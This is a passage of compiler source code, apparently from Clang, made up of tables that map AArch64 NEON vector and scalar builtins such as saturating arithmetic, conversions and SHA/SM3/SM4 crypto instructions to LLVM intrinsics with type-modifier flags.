NEONMAP0(vceqz_v),
NEONMAP0(vceqzq_v),
NEONMAP0(vcgez_v),
NEONMAP0(vcgezq_v),
NEONMAP0(vcgtz_v),
NEONMAP0(vcgtzq_v),
NEONMAP0(vclez_v),
NEONMAP0(vclezq_v),
NEONMAP1(vcls_v, aarch64_neon_cls, Add1ArgType),
NEONMAP1(vclsq_v, aarch64_neon_cls, Add1ArgType),
NEONMAP0(vcltz_v),
NEONMAP0(vcltzq_v),
NEONMAP1(vclz_v, ctlz, Add1ArgType),
NEONMAP1(vclzq_v, ctlz, Add1ArgType),
NEONMAP1(vcmla_rot180_v, aarch64_neon_vcmla_rot180, Add1ArgType),
NEONMAP1(vcmla_rot270_v, aarch64_neon_vcmla_rot270, Add1ArgType),
NEONMAP1(vcmla_rot90_v, aarch64_neon_vcmla_rot90, Add1ArgType),
NEONMAP1(vcmla_v, aarch64_neon_vcmla_rot0, Add1ArgType),
NEONMAP1(vcmlaq_rot180_v, aarch64_neon_vcmla_rot180, Add1ArgType),
NEONMAP1(vcmlaq_rot270_v, aarch64_neon_vcmla_rot270, Add1ArgType),
NEONMAP1(vcmlaq_rot90_v, aarch64_neon_vcmla_rot90, Add1ArgType),
NEONMAP1(vcmlaq_v, aarch64_neon_vcmla_rot0, Add1ArgType),
NEONMAP1(vcnt_v, ctpop, Add1ArgType),
NEONMAP1(vcntq_v, ctpop, Add1ArgType),
NEONMAP1(vcvt_f16_f32, aarch64_neon_vcvtfp2hf, 0),
NEONMAP0(vcvt_f16_v),
NEONMAP1(vcvt_f32_f16, aarch64_neon_vcvthf2fp, 0),
NEONMAP0(vcvt_f32_v),
NEONMAP2(vcvt_n_f16_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvt_n_f32_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvt_n_f64_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP1(vcvt_n_s16_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_s32_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_s64_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvt_n_u16_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvt_n_u32_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvt_n_u64_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP0(vcvtq_f16_v),
NEONMAP0(vcvtq_f32_v),
NEONMAP1(vcvtq_high_bf16_v, aarch64_neon_bfcvtn2, 0),
NEONMAP2(vcvtq_n_f16_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvtq_n_f32_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP2(vcvtq_n_f64_v, aarch64_neon_vcvtfxu2fp, aarch64_neon_vcvtfxs2fp, 0),
NEONMAP1(vcvtq_n_s16_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_s32_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_s64_v, aarch64_neon_vcvtfp2fxs, 0),
NEONMAP1(vcvtq_n_u16_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvtq_n_u32_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvtq_n_u64_v, aarch64_neon_vcvtfp2fxu, 0),
NEONMAP1(vcvtx_f32_v, aarch64_neon_fcvtxn, AddRetType | Add1ArgType),
NEONMAP2(vdot_v, aarch64_neon_udot, aarch64_neon_sdot, 0),
NEONMAP2(vdotq_v, aarch64_neon_udot, aarch64_neon_sdot, 0),
NEONMAP2(veor3q_v, aarch64_crypto_eor3u, aarch64_crypto_eor3s, Add1ArgType | UnsignedAlts),
NEONMAP0(vext_v),
NEONMAP0(vextq_v),
NEONMAP0(vfma_v),
NEONMAP0(vfmaq_v),
NEONMAP1(vfmlal_high_v, aarch64_neon_fmlal2, 0),
NEONMAP1(vfmlal_low_v, aarch64_neon_fmlal, 0),
NEONMAP1(vfmlalq_high_v, aarch64_neon_fmlal2, 0),
NEONMAP1(vfmlalq_low_v, aarch64_neon_fmlal, 0),
NEONMAP1(vfmlsl_high_v, aarch64_neon_fmlsl2, 0),
NEONMAP1(vfmlsl_low_v, aarch64_neon_fmlsl, 0),
NEONMAP1(vfmlslq_high_v, aarch64_neon_fmlsl2, 0),
NEONMAP1(vfmlslq_low_v, aarch64_neon_fmlsl, 0),
NEONMAP2(vhadd_v, aarch64_neon_uhadd, aarch64_neon_shadd, Add1ArgType | UnsignedAlts),
NEONMAP2(vhaddq_v, aarch64_neon_uhadd, aarch64_neon_shadd, Add1ArgType | UnsignedAlts),
NEONMAP2(vhsub_v, aarch64_neon_uhsub, aarch64_neon_shsub, Add1ArgType | UnsignedAlts),
NEONMAP2(vhsubq_v, aarch64_neon_uhsub, aarch64_neon_shsub, Add1ArgType | UnsignedAlts),
NEONMAP1(vld1_x2_v, aarch64_neon_ld1x2, 0),
NEONMAP1(vld1_x3_v, aarch64_neon_ld1x3, 0),
NEONMAP1(vld1_x4_v, aarch64_neon_ld1x4, 0),
NEONMAP1(vld1q_x2_v, aarch64_neon_ld1x2, 0),
NEONMAP1(vld1q_x3_v, aarch64_neon_ld1x3, 0),
NEONMAP1(vld1q_x4_v, aarch64_neon_ld1x4, 0),
NEONMAP2(vmmlaq_v, aarch64_neon_ummla, aarch64_neon_smmla, 0),
NEONMAP0(vmovl_v),
NEONMAP0(vmovn_v),
NEONMAP1(vmul_v, aarch64_neon_pmul, Add1ArgType),
NEONMAP1(vmulq_v, aarch64_neon_pmul, Add1ArgType),
NEONMAP1(vpadd_v, aarch64_neon_addp, Add1ArgType),
NEONMAP2(vpaddl_v, aarch64_neon_uaddlp, aarch64_neon_saddlp, UnsignedAlts),
NEONMAP2(vpaddlq_v, aarch64_neon_uaddlp, aarch64_neon_saddlp, UnsignedAlts),
NEONMAP1(vpaddq_v, aarch64_neon_addp, Add1ArgType),
NEONMAP1(vqabs_v, aarch64_neon_sqabs, Add1ArgType),
NEONMAP1(vqabsq_v, aarch64_neon_sqabs, Add1ArgType),
NEONMAP2(vqadd_v, aarch64_neon_uqadd, aarch64_neon_sqadd, Add1ArgType | UnsignedAlts),
NEONMAP2(vqaddq_v, aarch64_neon_uqadd, aarch64_neon_sqadd, Add1ArgType | UnsignedAlts),
NEONMAP2(vqdmlal_v, aarch64_neon_sqdmull, aarch64_neon_sqadd, 0),
NEONMAP2(vqdmlsl_v, aarch64_neon_sqdmull, aarch64_neon_sqsub, 0),
NEONMAP1(vqdmulh_lane_v, aarch64_neon_sqdmulh_lane, 0),
NEONMAP1(vqdmulh_laneq_v, aarch64_neon_sqdmulh_laneq, 0),
NEONMAP1(vqdmulh_v, aarch64_neon_sqdmulh, Add1ArgType),
NEONMAP1(vqdmulhq_lane_v, aarch64_neon_sqdmulh_lane, 0),
NEONMAP1(vqdmulhq_laneq_v, aarch64_neon_sqdmulh_laneq, 0),
NEONMAP1(vqdmulhq_v, aarch64_neon_sqdmulh, Add1ArgType),
NEONMAP1(vqdmull_v, aarch64_neon_sqdmull, Add1ArgType),
NEONMAP2(vqmovn_v, aarch64_neon_uqxtn, aarch64_neon_sqxtn, Add1ArgType | UnsignedAlts),
NEONMAP1(vqmovun_v, aarch64_neon_sqxtun, Add1ArgType),
NEONMAP1(vqneg_v, aarch64_neon_sqneg, Add1ArgType),
NEONMAP1(vqnegq_v, aarch64_neon_sqneg, Add1ArgType),
NEONMAP1(vqrdmulh_lane_v, aarch64_neon_sqrdmulh_lane, 0),
NEONMAP1(vqrdmulh_laneq_v, aarch64_neon_sqrdmulh_laneq, 0),
NEONMAP1(vqrdmulh_v, aarch64_neon_sqrdmulh, Add1ArgType),
NEONMAP1(vqrdmulhq_lane_v, aarch64_neon_sqrdmulh_lane, 0),
NEONMAP1(vqrdmulhq_laneq_v, aarch64_neon_sqrdmulh_laneq, 0),
NEONMAP1(vqrdmulhq_v, aarch64_neon_sqrdmulh, Add1ArgType),
NEONMAP2(vqrshl_v, aarch64_neon_uqrshl, aarch64_neon_sqrshl, Add1ArgType | UnsignedAlts),
NEONMAP2(vqrshlq_v, aarch64_neon_uqrshl, aarch64_neon_sqrshl, Add1ArgType | UnsignedAlts),
NEONMAP2(vqshl_n_v, aarch64_neon_uqshl, aarch64_neon_sqshl, UnsignedAlts),
NEONMAP2(vqshl_v, aarch64_neon_uqshl, aarch64_neon_sqshl, Add1ArgType | UnsignedAlts),
NEONMAP2(vqshlq_n_v, aarch64_neon_uqshl, aarch64_neon_sqshl, UnsignedAlts),
NEONMAP2(vqshlq_v, aarch64_neon_uqshl, aarch64_neon_sqshl, Add1ArgType | UnsignedAlts),
NEONMAP1(vqshlu_n_v, aarch64_neon_sqshlu, 0),
NEONMAP1(vqshluq_n_v, aarch64_neon_sqshlu, 0),
NEONMAP2(vqsub_v, aarch64_neon_uqsub, aarch64_neon_sqsub, Add1ArgType | UnsignedAlts),
NEONMAP2(vqsubq_v, aarch64_neon_uqsub, aarch64_neon_sqsub, Add1ArgType | UnsignedAlts),
NEONMAP1(vraddhn_v, aarch64_neon_raddhn, Add1ArgType),
NEONMAP1(vrax1q_v, aarch64_crypto_rax1, 0),
NEONMAP2(vrecpe_v, aarch64_neon_frecpe, aarch64_neon_urecpe, 0),
NEONMAP2(vrecpeq_v, aarch64_neon_frecpe, aarch64_neon_urecpe, 0),
NEONMAP1(vrecps_v, aarch64_neon_frecps, Add1ArgType),
NEONMAP1(vrecpsq_v, aarch64_neon_frecps, Add1ArgType),
NEONMAP2(vrhadd_v, aarch64_neon_urhadd, aarch64_neon_srhadd, Add1ArgType | UnsignedAlts),
NEONMAP2(vrhaddq_v, aarch64_neon_urhadd, aarch64_neon_srhadd, Add1ArgType | UnsignedAlts),
NEONMAP1(vrnd32x_v, aarch64_neon_frint32x, Add1ArgType),
NEONMAP1(vrnd32xq_v, aarch64_neon_frint32x, Add1ArgType),
NEONMAP1(vrnd32z_v, aarch64_neon_frint32z, Add1ArgType),
NEONMAP1(vrnd32zq_v, aarch64_neon_frint32z, Add1ArgType),
NEONMAP1(vrnd64x_v, aarch64_neon_frint64x, Add1ArgType),
NEONMAP1(vrnd64xq_v, aarch64_neon_frint64x, Add1ArgType),
NEONMAP1(vrnd64z_v, aarch64_neon_frint64z, Add1ArgType),
NEONMAP1(vrnd64zq_v, aarch64_neon_frint64z, Add1ArgType),
NEONMAP0(vrndi_v),
NEONMAP0(vrndiq_v),
NEONMAP2(vrshl_v, aarch64_neon_urshl, aarch64_neon_srshl, Add1ArgType | UnsignedAlts),
NEONMAP2(vrshlq_v, aarch64_neon_urshl, aarch64_neon_srshl, Add1ArgType | UnsignedAlts),
NEONMAP2(vrshr_n_v, aarch64_neon_urshl, aarch64_neon_srshl, UnsignedAlts),
NEONMAP2(vrshrq_n_v, aarch64_neon_urshl, aarch64_neon_srshl, UnsignedAlts),
NEONMAP2(vrsqrte_v, aarch64_neon_frsqrte, aarch64_neon_ursqrte, 0),
NEONMAP2(vrsqrteq_v, aarch64_neon_frsqrte, aarch64_neon_ursqrte, 0),
NEONMAP1(vrsqrts_v, aarch64_neon_frsqrts, Add1ArgType),
NEONMAP1(vrsqrtsq_v, aarch64_neon_frsqrts, Add1ArgType),
NEONMAP1(vrsubhn_v, aarch64_neon_rsubhn, Add1ArgType),
NEONMAP1(vsha1su0q_v, aarch64_crypto_sha1su0, 0),
NEONMAP1(vsha1su1q_v, aarch64_crypto_sha1su1, 0),
NEONMAP1(vsha256h2q_v, aarch64_crypto_sha256h2, 0),
NEONMAP1(vsha256hq_v, aarch64_crypto_sha256h, 0),
NEONMAP1(vsha256su0q_v, aarch64_crypto_sha256su0, 0),
NEONMAP1(vsha256su1q_v, aarch64_crypto_sha256su1, 0),
NEONMAP1(vsha512h2q_v, aarch64_crypto_sha512h2, 0),
NEONMAP1(vsha512hq_v, aarch64_crypto_sha512h, 0),
NEONMAP1(vsha512su0q_v, aarch64_crypto_sha512su0, 0),
NEONMAP1(vsha512su1q_v, aarch64_crypto_sha512su1, 0),
NEONMAP0(vshl_n_v),
NEONMAP2(vshl_v, aarch64_neon_ushl, aarch64_neon_sshl, Add1ArgType | UnsignedAlts),
NEONMAP0(vshll_n_v),
NEONMAP0(vshlq_n_v),
NEONMAP2(vshlq_v, aarch64_neon_ushl, aarch64_neon_sshl, Add1ArgType | UnsignedAlts),
NEONMAP0(vshr_n_v),
NEONMAP0(vshrn_n_v),
NEONMAP0(vshrq_n_v),
NEONMAP1(vsm3partw1q_v, aarch64_crypto_sm3partw1, 0),
NEONMAP1(vsm3partw2q_v, aarch64_crypto_sm3partw2, 0),
NEONMAP1(vsm3ss1q_v, aarch64_crypto_sm3ss1, 0),
NEONMAP1(vsm3tt1aq_v, aarch64_crypto_sm3tt1a, 0),
NEONMAP1(vsm3tt1bq_v, aarch64_crypto_sm3tt1b, 0),
NEONMAP1(vsm3tt2aq_v, aarch64_crypto_sm3tt2a, 0),
NEONMAP1(vsm3tt2bq_v, aarch64_crypto_sm3tt2b, 0),
NEONMAP1(vsm4ekeyq_v, aarch64_crypto_sm4ekey, 0),
NEONMAP1(vsm4eq_v, aarch64_crypto_sm4e, 0),
NEONMAP1(vst1_x2_v, aarch64_neon_st1x2, 0),
NEONMAP1(vst1_x3_v, aarch64_neon_st1x3, 0),
NEONMAP1(vst1_x4_v, aarch64_neon_st1x4, 0),
NEONMAP1(vst1q_x2_v, aarch64_neon_st1x2, 0),
NEONMAP1(vst1q_x3_v, aarch64_neon_st1x3, 0),
NEONMAP1(vst1q_x4_v, aarch64_neon_st1x4, 0),
NEONMAP0(vsubhn_v),
NEONMAP0(vtst_v),
NEONMAP0(vtstq_v),
NEONMAP1(vusdot_v, aarch64_neon_usdot, 0),
NEONMAP1(vusdotq_v, aarch64_neon_usdot, 0),
NEONMAP1(vusmmlaq_v, aarch64_neon_usmmla, 0),
NEONMAP1(vxarq_v, aarch64_crypto_xar, 0),
};
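// Scalar (SISD) builtins: most reuse the vector intrinsics, with modifiers
// such as Vectorize1ArgType/Use64BitVectors describing how scalar operands
// are packaged into vectors for the call.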
static const ARMVectorIntrinsicInfo AArch64SISDIntrinsicMap[] = {
NEONMAP1(vabdd_f64, aarch64_sisd_fabd, Add1ArgType),
NEONMAP1(vabds_f32, aarch64_sisd_fabd, Add1ArgType),
NEONMAP1(vabsd_s64, aarch64_neon_abs, Add1ArgType),
NEONMAP1(vaddlv_s32, aarch64_neon_saddlv, AddRetType | Add1ArgType),
NEONMAP1(vaddlv_u32, aarch64_neon_uaddlv, AddRetType | Add1ArgType),
NEONMAP1(vaddlvq_s32, aarch64_neon_saddlv, AddRetType | Add1ArgType),
NEONMAP1(vaddlvq_u32, aarch64_neon_uaddlv, AddRetType | Add1ArgType),
NEONMAP1(vaddv_f32, aarch64_neon_faddv, AddRetType | Add1ArgType),
NEONMAP1(vaddv_s32, aarch64_neon_saddv, AddRetType | Add1ArgType),
NEONMAP1(vaddv_u32, aarch64_neon_uaddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_f32, aarch64_neon_faddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_f64, aarch64_neon_faddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_s32, aarch64_neon_saddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_s64, aarch64_neon_saddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_u32, aarch64_neon_uaddv, AddRetType | Add1ArgType),
NEONMAP1(vaddvq_u64, aarch64_neon_uaddv, AddRetType | Add1ArgType),
NEONMAP1(vcaged_f64, aarch64_neon_facge, AddRetType | Add1ArgType),
NEONMAP1(vcages_f32, aarch64_neon_facge, AddRetType | Add1ArgType),
NEONMAP1(vcagtd_f64, aarch64_neon_facgt, AddRetType | Add1ArgType),
NEONMAP1(vcagts_f32, aarch64_neon_facgt, AddRetType | Add1ArgType),
NEONMAP1(vcaled_f64, aarch64_neon_facge, AddRetType | Add1ArgType),
NEONMAP1(vcales_f32, aarch64_neon_facge, AddRetType | Add1ArgType),
NEONMAP1(vcaltd_f64, aarch64_neon_facgt, AddRetType | Add1ArgType),
NEONMAP1(vcalts_f32, aarch64_neon_facgt, AddRetType | Add1ArgType),
NEONMAP1(vcvtad_s64_f64, aarch64_neon_fcvtas, AddRetType | Add1ArgType),
NEONMAP1(vcvtad_u64_f64, aarch64_neon_fcvtau, AddRetType | Add1ArgType),
NEONMAP1(vcvtas_s32_f32, aarch64_neon_fcvtas, AddRetType | Add1ArgType),
NEONMAP1(vcvtas_u32_f32, aarch64_neon_fcvtau, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_n_f64_s64, aarch64_neon_vcvtfxs2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_n_f64_u64, aarch64_neon_vcvtfxu2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_n_s64_f64, aarch64_neon_vcvtfp2fxs, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_n_u64_f64, aarch64_neon_vcvtfp2fxu, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_s64_f64, aarch64_neon_fcvtzs, AddRetType | Add1ArgType),
NEONMAP1(vcvtd_u64_f64, aarch64_neon_fcvtzu, AddRetType | Add1ArgType),
NEONMAP1(vcvth_bf16_f32, aarch64_neon_bfcvt, 0),
NEONMAP1(vcvtmd_s64_f64, aarch64_neon_fcvtms, AddRetType | Add1ArgType),
NEONMAP1(vcvtmd_u64_f64, aarch64_neon_fcvtmu, AddRetType | Add1ArgType),
NEONMAP1(vcvtms_s32_f32, aarch64_neon_fcvtms, AddRetType | Add1ArgType),
NEONMAP1(vcvtms_u32_f32, aarch64_neon_fcvtmu, AddRetType | Add1ArgType),
NEONMAP1(vcvtnd_s64_f64, aarch64_neon_fcvtns, AddRetType | Add1ArgType),
NEONMAP1(vcvtnd_u64_f64, aarch64_neon_fcvtnu, AddRetType | Add1ArgType),
NEONMAP1(vcvtns_s32_f32, aarch64_neon_fcvtns, AddRetType | Add1ArgType),
NEONMAP1(vcvtns_u32_f32, aarch64_neon_fcvtnu, AddRetType | Add1ArgType),
NEONMAP1(vcvtpd_s64_f64, aarch64_neon_fcvtps, AddRetType | Add1ArgType),
NEONMAP1(vcvtpd_u64_f64, aarch64_neon_fcvtpu, AddRetType | Add1ArgType),
NEONMAP1(vcvtps_s32_f32, aarch64_neon_fcvtps, AddRetType | Add1ArgType),
NEONMAP1(vcvtps_u32_f32, aarch64_neon_fcvtpu, AddRetType | Add1ArgType),
NEONMAP1(vcvts_n_f32_s32, aarch64_neon_vcvtfxs2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvts_n_f32_u32, aarch64_neon_vcvtfxu2fp, AddRetType | Add1ArgType),
NEONMAP1(vcvts_n_s32_f32, aarch64_neon_vcvtfp2fxs, AddRetType | Add1ArgType),
NEONMAP1(vcvts_n_u32_f32, aarch64_neon_vcvtfp2fxu, AddRetType | Add1ArgType),
NEONMAP1(vcvts_s32_f32, aarch64_neon_fcvtzs, AddRetType | Add1ArgType),
NEONMAP1(vcvts_u32_f32, aarch64_neon_fcvtzu, AddRetType | Add1ArgType),
NEONMAP1(vcvtxd_f32_f64, aarch64_sisd_fcvtxn, 0),
NEONMAP1(vmaxnmv_f32, aarch64_neon_fmaxnmv, AddRetType | Add1ArgType),
NEONMAP1(vmaxnmvq_f32, aarch64_neon_fmaxnmv, AddRetType | Add1ArgType),
NEONMAP1(vmaxnmvq_f64, aarch64_neon_fmaxnmv, AddRetType | Add1ArgType),
NEONMAP1(vmaxv_f32, aarch64_neon_fmaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxv_s32, aarch64_neon_smaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxv_u32, aarch64_neon_umaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxvq_f32, aarch64_neon_fmaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxvq_f64, aarch64_neon_fmaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxvq_s32, aarch64_neon_smaxv, AddRetType | Add1ArgType),
NEONMAP1(vmaxvq_u32, aarch64_neon_umaxv, AddRetType | Add1ArgType),
NEONMAP1(vminnmv_f32, aarch64_neon_fminnmv, AddRetType | Add1ArgType),
NEONMAP1(vminnmvq_f32, aarch64_neon_fminnmv, AddRetType | Add1ArgType),
NEONMAP1(vminnmvq_f64, aarch64_neon_fminnmv, AddRetType | Add1ArgType),
NEONMAP1(vminv_f32, aarch64_neon_fminv, AddRetType | Add1ArgType),
NEONMAP1(vminv_s32, aarch64_neon_sminv, AddRetType | Add1ArgType),
NEONMAP1(vminv_u32, aarch64_neon_uminv, AddRetType | Add1ArgType),
NEONMAP1(vminvq_f32, aarch64_neon_fminv, AddRetType | Add1ArgType),
NEONMAP1(vminvq_f64, aarch64_neon_fminv, AddRetType | Add1ArgType),
NEONMAP1(vminvq_s32, aarch64_neon_sminv, AddRetType | Add1ArgType),
NEONMAP1(vminvq_u32, aarch64_neon_uminv, AddRetType | Add1ArgType),
NEONMAP1(vmull_p64, aarch64_neon_pmull64, 0),
NEONMAP1(vmulxd_f64, aarch64_neon_fmulx, Add1ArgType),
NEONMAP1(vmulxs_f32, aarch64_neon_fmulx, Add1ArgType),
NEONMAP1(vpaddd_s64, aarch64_neon_uaddv, AddRetType | Add1ArgType),
NEONMAP1(vpaddd_u64, aarch64_neon_uaddv, AddRetType | Add1ArgType),
NEONMAP1(vpmaxnmqd_f64, aarch64_neon_fmaxnmv, AddRetType | Add1ArgType),
NEONMAP1(vpmaxnms_f32, aarch64_neon_fmaxnmv, AddRetType | Add1ArgType),
NEONMAP1(vpmaxqd_f64, aarch64_neon_fmaxv, AddRetType | Add1ArgType),
NEONMAP1(vpmaxs_f32, aarch64_neon_fmaxv, AddRetType | Add1ArgType),
NEONMAP1(vpminnmqd_f64, aarch64_neon_fminnmv, AddRetType | Add1ArgType),
NEONMAP1(vpminnms_f32, aarch64_neon_fminnmv, AddRetType | Add1ArgType),
NEONMAP1(vpminqd_f64, aarch64_neon_fminv, AddRetType | Add1ArgType),
NEONMAP1(vpmins_f32, aarch64_neon_fminv, AddRetType | Add1ArgType),
NEONMAP1(vqabsb_s8, aarch64_neon_sqabs, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqabsd_s64, aarch64_neon_sqabs, Add1ArgType),
NEONMAP1(vqabsh_s16, aarch64_neon_sqabs, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqabss_s32, aarch64_neon_sqabs, Add1ArgType),
NEONMAP1(vqaddb_s8, aarch64_neon_sqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqaddb_u8, aarch64_neon_uqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqaddd_s64, aarch64_neon_sqadd, Add1ArgType),
NEONMAP1(vqaddd_u64, aarch64_neon_uqadd, Add1ArgType),
NEONMAP1(vqaddh_s16, aarch64_neon_sqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqaddh_u16, aarch64_neon_uqadd, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqadds_s32, aarch64_neon_sqadd, Add1ArgType),
NEONMAP1(vqadds_u32, aarch64_neon_uqadd, Add1ArgType),
NEONMAP1(vqdmulhh_s16, aarch64_neon_sqdmulh, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqdmulhs_s32, aarch64_neon_sqdmulh, Add1ArgType),
NEONMAP1(vqdmullh_s16, aarch64_neon_sqdmull, VectorRet | Use128BitVectors),
NEONMAP1(vqdmulls_s32, aarch64_neon_sqdmulls_scalar, 0),
NEONMAP1(vqmovnd_s64, aarch64_neon_scalar_sqxtn, AddRetType | Add1ArgType),
NEONMAP1(vqmovnd_u64, aarch64_neon_scalar_uqxtn, AddRetType | Add1ArgType),
NEONMAP1(vqmovnh_s16, aarch64_neon_sqxtn, VectorRet | Use64BitVectors),
NEONMAP1(vqmovnh_u16, aarch64_neon_uqxtn, VectorRet | Use64BitVectors),
NEONMAP1(vqmovns_s32, aarch64_neon_sqxtn, VectorRet | Use64BitVectors),
NEONMAP1(vqmovns_u32, aarch64_neon_uqxtn, VectorRet | Use64BitVectors),
NEONMAP1(vqmovund_s64, aarch64_neon_scalar_sqxtun, AddRetType | Add1ArgType),
NEONMAP1(vqmovunh_s16, aarch64_neon_sqxtun, VectorRet | Use64BitVectors),
NEONMAP1(vqmovuns_s32, aarch64_neon_sqxtun, VectorRet | Use64BitVectors),
NEONMAP1(vqnegb_s8, aarch64_neon_sqneg, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqnegd_s64, aarch64_neon_sqneg, Add1ArgType),
NEONMAP1(vqnegh_s16, aarch64_neon_sqneg, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqnegs_s32, aarch64_neon_sqneg, Add1ArgType),
NEONMAP1(vqrdmulhh_s16, aarch64_neon_sqrdmulh, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqrdmulhs_s32, aarch64_neon_sqrdmulh, Add1ArgType),
NEONMAP1(vqrshlb_s8, aarch64_neon_sqrshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqrshlb_u8, aarch64_neon_uqrshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqrshld_s64, aarch64_neon_sqrshl, Add1ArgType),
NEONMAP1(vqrshld_u64, aarch64_neon_uqrshl, Add1ArgType),
NEONMAP1(vqrshlh_s16, aarch64_neon_sqrshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqrshlh_u16, aarch64_neon_uqrshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqrshls_s32, aarch64_neon_sqrshl, Add1ArgType),
NEONMAP1(vqrshls_u32, aarch64_neon_uqrshl, Add1ArgType),
NEONMAP1(vqrshrnd_n_s64, aarch64_neon_sqrshrn, AddRetType),
NEONMAP1(vqrshrnd_n_u64, aarch64_neon_uqrshrn, AddRetType),
NEONMAP1(vqrshrnh_n_s16, aarch64_neon_sqrshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqrshrnh_n_u16, aarch64_neon_uqrshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqrshrns_n_s32, aarch64_neon_sqrshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqrshrns_n_u32, aarch64_neon_uqrshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqrshrund_n_s64, aarch64_neon_sqrshrun, AddRetType),
NEONMAP1(vqrshrunh_n_s16, aarch64_neon_sqrshrun, VectorRet | Use64BitVectors),
NEONMAP1(vqrshruns_n_s32, aarch64_neon_sqrshrun, VectorRet | Use64BitVectors),
NEONMAP1(vqshlb_n_s8, aarch64_neon_sqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlb_n_u8, aarch64_neon_uqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlb_s8, aarch64_neon_sqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlb_u8, aarch64_neon_uqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshld_s64, aarch64_neon_sqshl, Add1ArgType),
NEONMAP1(vqshld_u64, aarch64_neon_uqshl, Add1ArgType),
NEONMAP1(vqshlh_n_s16, aarch64_neon_sqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlh_n_u16, aarch64_neon_uqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlh_s16, aarch64_neon_sqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlh_u16, aarch64_neon_uqshl, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshls_n_s32, aarch64_neon_sqshl, Add1ArgType),
NEONMAP1(vqshls_n_u32, aarch64_neon_uqshl, Add1ArgType),
NEONMAP1(vqshls_s32, aarch64_neon_sqshl, Add1ArgType),
NEONMAP1(vqshls_u32, aarch64_neon_uqshl, Add1ArgType),
NEONMAP1(vqshlub_n_s8, aarch64_neon_sqshlu, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshluh_n_s16, aarch64_neon_sqshlu, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqshlus_n_s32, aarch64_neon_sqshlu, Add1ArgType),
NEONMAP1(vqshrnd_n_s64, aarch64_neon_sqshrn, AddRetType),
NEONMAP1(vqshrnd_n_u64, aarch64_neon_uqshrn, AddRetType),
NEONMAP1(vqshrnh_n_s16, aarch64_neon_sqshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqshrnh_n_u16, aarch64_neon_uqshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqshrns_n_s32, aarch64_neon_sqshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqshrns_n_u32, aarch64_neon_uqshrn, VectorRet | Use64BitVectors),
NEONMAP1(vqshrund_n_s64, aarch64_neon_sqshrun, AddRetType),
NEONMAP1(vqshrunh_n_s16, aarch64_neon_sqshrun, VectorRet | Use64BitVectors),
NEONMAP1(vqshruns_n_s32, aarch64_neon_sqshrun, VectorRet | Use64BitVectors),
NEONMAP1(vqsubb_s8, aarch64_neon_sqsub, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqsubb_u8, aarch64_neon_uqsub, Vectorize1ArgType | Use64BitVectors),
NEONMAP1(vqsubd_s64, aarch64_neon_sqsub, Add1ArgType),
NEONMAP1(vqsubd_u64, aarch64_neon_uqsub, Add1ArgType),
